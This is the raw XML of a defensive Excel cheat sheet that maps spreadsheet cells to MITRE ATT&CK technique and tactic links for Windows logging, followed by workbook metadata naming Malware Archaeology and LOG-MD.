    <hyperlink ref="C520" r:id="rId305" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B521" r:id="rId306" tooltip="Technique/T1021" display="https://attack.mitre.org/wiki/Technique/T1021"/>
    <hyperlink ref="C521" r:id="rId307" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B522" r:id="rId308" tooltip="Technique/T1018" display="https://attack.mitre.org/wiki/Technique/T1018"/>
    <hyperlink ref="C522" r:id="rId309" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B529" r:id="rId310" tooltip="Technique/T1091" display="https://attack.mitre.org/wiki/Technique/T1091"/>
    <hyperlink ref="C529" r:id="rId311" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="C530" r:id="rId312" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="C531" r:id="rId313" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B532" r:id="rId314" tooltip="Technique/T1014" display="https://attack.mitre.org/wiki/Technique/T1014"/>
    <hyperlink ref="C532" r:id="rId315" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B533" r:id="rId316" tooltip="Technique/T1085" display="https://attack.mitre.org/wiki/Technique/T1085"/>
    <hyperlink ref="C533" r:id="rId317" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C534" r:id="rId318" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B536" r:id="rId319" tooltip="Technique/T1178" display="https://attack.mitre.org/wiki/Technique/T1178"/>
    <hyperlink ref="C536" r:id="rId320" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B537" r:id="rId321" tooltip="Technique/T1198" display="https://attack.mitre.org/wiki/Technique/T1198"/>
    <hyperlink ref="C537" r:id="rId322" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C538" r:id="rId323" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B545" r:id="rId324" tooltip="Technique/T1053" display="https://attack.mitre.org/wiki/Technique/T1053"/>
    <hyperlink ref="C545" r:id="rId325" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="C546" r:id="rId326" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C547" r:id="rId327" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B548" r:id="rId328" tooltip="Technique/T1029" display="https://attack.mitre.org/wiki/Technique/T1029"/>
    <hyperlink ref="C548" r:id="rId329" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B549" r:id="rId330" tooltip="Technique/T1113" display="https://attack.mitre.org/wiki/Technique/T1113"/>
    <hyperlink ref="C549" r:id="rId331" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B554" r:id="rId332" tooltip="Technique/T1180" display="https://attack.mitre.org/wiki/Technique/T1180"/>
    <hyperlink ref="C554" r:id="rId333" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B560" r:id="rId334" tooltip="Technique/T1064" display="https://attack.mitre.org/wiki/Technique/T1064"/>
    <hyperlink ref="C560" r:id="rId335" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C561" r:id="rId336" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B563" r:id="rId337" tooltip="Technique/T1063" display="https://attack.mitre.org/wiki/Technique/T1063"/>
    <hyperlink ref="C563" r:id="rId338" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B568" r:id="rId339" tooltip="Technique/T1101" display="https://attack.mitre.org/wiki/Technique/T1101"/>
    <hyperlink ref="C568" r:id="rId340" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B569" r:id="rId341" tooltip="Technique/T1035" display="https://attack.mitre.org/wiki/Technique/T1035"/>
    <hyperlink ref="C569" r:id="rId342" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B570" r:id="rId343" tooltip="Technique/T1058" display="https://attack.mitre.org/wiki/Technique/T1058"/>
    <hyperlink ref="C570" r:id="rId344" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C571" r:id="rId345" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B573" r:id="rId346" tooltip="Technique/T1051" display="https://attack.mitre.org/wiki/Technique/T1051"/>
    <hyperlink ref="C573" r:id="rId347" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B574" r:id="rId348" tooltip="Technique/T1023" display="https://attack.mitre.org/wiki/Technique/T1023"/>
    <hyperlink ref="C574" r:id="rId349" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B575" r:id="rId350" tooltip="Technique/T1218" display="https://attack.mitre.org/wiki/Technique/T1218"/>
    <hyperlink ref="C575" r:id="rId351" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C576" r:id="rId352" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B582" r:id="rId353" tooltip="Technique/T1216" display="https://attack.mitre.org/wiki/Technique/T1216"/>
    <hyperlink ref="C582" r:id="rId354" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C583" r:id="rId355" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B585" r:id="rId356" tooltip="Technique/T1045" display="https://attack.mitre.org/wiki/Technique/T1045"/>
    <hyperlink ref="C585" r:id="rId357" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B586" r:id="rId358" tooltip="Technique/T1193" display="https://attack.mitre.org/wiki/Technique/T1193"/>
    <hyperlink ref="C586" r:id="rId359" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B587" r:id="rId360" tooltip="Technique/T1192" display="https://attack.mitre.org/wiki/Technique/T1192"/>
    <hyperlink ref="C587" r:id="rId361" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B588" r:id="rId362" tooltip="Technique/T1194" display="https://attack.mitre.org/wiki/Technique/T1194"/>
    <hyperlink ref="C588" r:id="rId363" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B591" r:id="rId364" tooltip="Technique/T1071" display="https://attack.mitre.org/wiki/Technique/T1071"/>
    <hyperlink ref="C591" r:id="rId365" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B592" r:id="rId366" tooltip="Technique/T1032" display="https://attack.mitre.org/wiki/Technique/T1032"/>
    <hyperlink ref="C592" r:id="rId367" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B593" r:id="rId368" tooltip="Technique/T1095" display="https://attack.mitre.org/wiki/Technique/T1095"/>
    <hyperlink ref="C593" r:id="rId369" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B594" r:id="rId370" tooltip="Technique/T1195" display="https://attack.mitre.org/wiki/Technique/T1195"/>
    <hyperlink ref="C594" r:id="rId371" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B604" r:id="rId372" tooltip="Technique/T1019" display="https://attack.mitre.org/wiki/Technique/T1019"/>
    <hyperlink ref="C604" r:id="rId373" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B605" r:id="rId374" tooltip="Technique/T1082" display="https://attack.mitre.org/wiki/Technique/T1082"/>
    <hyperlink ref="C605" r:id="rId375" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B610" r:id="rId376" tooltip="Technique/T1016" display="https://attack.mitre.org/wiki/Technique/T1016"/>
    <hyperlink ref="C610" r:id="rId377" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B611" r:id="rId378" tooltip="Technique/T1049" display="https://attack.mitre.org/wiki/Technique/T1049"/>
    <hyperlink ref="C611" r:id="rId379" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B616" r:id="rId380" tooltip="Technique/T1033" display="https://attack.mitre.org/wiki/Technique/T1033"/>
    <hyperlink ref="C616" r:id="rId381" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B622" r:id="rId382" tooltip="Technique/T1007" display="https://attack.mitre.org/wiki/Technique/T1007"/>
    <hyperlink ref="C622" r:id="rId383" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B623" r:id="rId384" tooltip="Technique/T1124" display="https://attack.mitre.org/wiki/Technique/T1124"/>
    <hyperlink ref="C623" r:id="rId385" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B624" r:id="rId386" tooltip="Technique/T1080" display="https://attack.mitre.org/wiki/Technique/T1080"/>
    <hyperlink ref="C624" r:id="rId387" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B625" r:id="rId388" tooltip="Technique/T1072" display="https://attack.mitre.org/wiki/Technique/T1072"/>
    <hyperlink ref="C625" r:id="rId389" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="C626" r:id="rId390" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B628" r:id="rId391" tooltip="Technique/T1209" display="https://attack.mitre.org/wiki/Technique/T1209"/>
    <hyperlink ref="C628" r:id="rId392" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B631" r:id="rId393" tooltip="Technique/T1099" display="https://attack.mitre.org/wiki/Technique/T1099"/>
    <hyperlink ref="C631" r:id="rId394" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B632" r:id="rId395" tooltip="Technique/T1127" display="https://attack.mitre.org/wiki/Technique/T1127"/>
    <hyperlink ref="C632" r:id="rId396" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C633" r:id="rId397" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B649" r:id="rId398" tooltip="Technique/T1199" display="https://attack.mitre.org/wiki/Technique/T1199"/>
    <hyperlink ref="C649" r:id="rId399" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B650" r:id="rId400" tooltip="Technique/T1111" display="https://attack.mitre.org/wiki/Technique/T1111"/>
    <hyperlink ref="C650" r:id="rId401" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B654" r:id="rId402" tooltip="Technique/T1065" display="https://attack.mitre.org/wiki/Technique/T1065"/>
    <hyperlink ref="C654" r:id="rId403" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B655" r:id="rId404" tooltip="Technique/T1204" display="https://attack.mitre.org/wiki/Technique/T1204"/>
    <hyperlink ref="C655" r:id="rId405" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B656" r:id="rId406" tooltip="Technique/T1078" display="https://attack.mitre.org/wiki/Technique/T1078"/>
    <hyperlink ref="C656" r:id="rId407" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C657" r:id="rId408" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C658" r:id="rId409" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="C659" r:id="rId410" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B660" r:id="rId411" tooltip="Technique/T1125" display="https://attack.mitre.org/wiki/Technique/T1125"/>
    <hyperlink ref="C660" r:id="rId412" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B663" r:id="rId413" tooltip="Technique/T1102" display="https://attack.mitre.org/wiki/Technique/T1102"/>
    <hyperlink ref="C663" r:id="rId414" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="C664" r:id="rId415" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B667" r:id="rId416" tooltip="Technique/T1100" display="https://attack.mitre.org/wiki/Technique/T1100"/>
    <hyperlink ref="C667" r:id="rId417" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C668" r:id="rId418" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B669" r:id="rId419" tooltip="Technique/T1077" display="https://attack.mitre.org/wiki/Technique/T1077"/>
    <hyperlink ref="C669" r:id="rId420" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B672" r:id="rId421" tooltip="Technique/T1047" display="https://attack.mitre.org/wiki/Technique/T1047"/>
    <hyperlink ref="C672" r:id="rId422" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B673" r:id="rId423" tooltip="Technique/T1084" display="https://attack.mitre.org/wiki/Technique/T1084"/>
    <hyperlink ref="C673" r:id="rId424" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B674" r:id="rId425" tooltip="Technique/T1028" display="https://attack.mitre.org/wiki/Technique/T1028"/>
    <hyperlink ref="C674" r:id="rId426" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="C675" r:id="rId427" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B676" r:id="rId428" tooltip="Technique/T1004" display="https://attack.mitre.org/wiki/Technique/T1004"/>
    <hyperlink ref="C676" r:id="rId429" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" r:id="rId4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W21" sqref="W21"/>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Matrix</vt:lpstr>
      <vt:lpstr>Details</vt:lpstr>
      <vt:lpstr>Graphs</vt:lpstr>
      <vt:lpstr>Stats</vt:lpstr>
      <vt:lpstr>Notes</vt:lpstr>
      <vt:lpstr>Sample 2</vt:lpstr>
      <vt:lpstr>Sample</vt:lpstr>
      <vt:lpstr>Detailed Matrix</vt:lpstr>
      <vt:lpstr>Quick Wins</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Malware Archaeology</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinkBase>http://MalwareArchaeology.com\cheat-sheets</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MITREE ATT&amp;CK Matrix</dc:title>
  <dc:subject>MITRE ATT&amp;CK</dc:subject>
  <dc:creator>LOG-MD;Malware Archaeologist</dc:creator>
  <cp:keywords>ATT&amp;CK, LOG-MD, Windows, Logging</cp:keywords>
  <cp:lastModifiedBy>Stupid-User</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-01T15:15:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-17T20:11:34Z</dcterms:modified>
</cp:coreProperties>
</file>